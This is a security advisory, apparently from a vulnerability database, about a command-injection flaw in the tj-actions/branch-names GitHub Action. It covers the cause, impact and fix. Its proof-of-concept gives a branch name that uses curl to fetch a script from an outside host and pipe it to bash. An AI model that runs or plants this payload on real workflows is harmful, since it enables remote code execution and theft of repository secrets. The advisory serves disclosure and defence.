Описание
tj-actions/branch-names has a Command Injection Vulnerability
Overview
A critical vulnerability has been identified in the tj-actions/branch-names GitHub Action workflow which allows arbitrary command execution in downstream workflows. This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags. While internal sanitization mechanisms have been implemented, the action outputs remain vulnerable, exposing consuming workflows to significant security risks.
Technical Details
The vulnerability stems from the unsafe use of the eval printf "%s" pattern within the action's codebase. Although initial sanitization using printf "%q" properly escapes untrusted input, subsequent unescaping via eval printf "%s" reintroduces command injection risks. This unsafe pattern is demonstrated in the following code snippet:
This approach allows attackers to inject arbitrary commands into workflows consuming these outputs, as shown in the Proof-of-Concept (PoC) below.
Proof-of-Concept (PoC)
- Create a branch with the name
$(curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash). - Trigger the vulnerable workflow by opening a pull request into the target repository.
- Observe arbitrary code execution in the workflow logs.
Example output:
Impact
This vulnerability enables arbitrary command execution in repositories consuming outputs from tj-actions/branch-names. The severity of the impact depends on the permissions granted to the GITHUB_TOKEN and the context of the triggering event. Potential consequences include:
- Theft of sensitive secrets stored in the repository.
- Unauthorized write access to the repository.
- Compromise of the repository's integrity and security.
Mitigation and Resolution
To address this vulnerability, the unsafe eval printf "%s" pattern must be replaced with safer alternatives. Specifically, direct printf calls can achieve the same functionality without unescaping shell-unsafe characters. Below is the recommended fix:
This approach ensures that all outputs remain properly escaped and safe for downstream consumption.
Recommendations
- Immediate Action: Developers using the
tj-actions/branch-namesworkflow should update their workflows to latest major version v9.
References
Ссылки
- https://github.com/tj-actions/branch-names/security/advisories/GHSA-8v8w-v8xg-79rf
- https://github.com/tj-actions/branch-names/security/advisories/GHSA-gq52-6phf-x2r6
- https://github.com/tj-actions/changed-files/security/advisories/GHSA-mcph-m25j-8j63
- https://nvd.nist.gov/vuln/detail/CVE-2025-54416
- https://github.com/tj-actions/branch-names/commit/e497ceb8ccd43fd9573cf2e375216625bc411d1f
- https://github.blog/security/application-security/how-to-secure-your-github-actions-workflows-with-codeql
- https://github.com/tj-actions/branch-names/releases/tag/v9.0.0
- https://securitylab.github.com/resources/github-actions-untrusted-input
Пакеты
tj-actions/branch-names
<= 8.2.1
9.0.0
Связанные уязвимости
tj-actions/branch-names is a Github actions repository that contains workflows to retrieve branch or tag names with support for all events. In versions 8.2.1 and below, a critical vulnerability has been identified in the tj-actions/branch-names' GitHub Action workflow which allows arbitrary command execution in downstream workflows. This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags. While internal sanitization mechanisms have been implemented, the action outputs remain vulnerable, exposing consuming workflows to significant security risks. This is fixed in version 9.0.0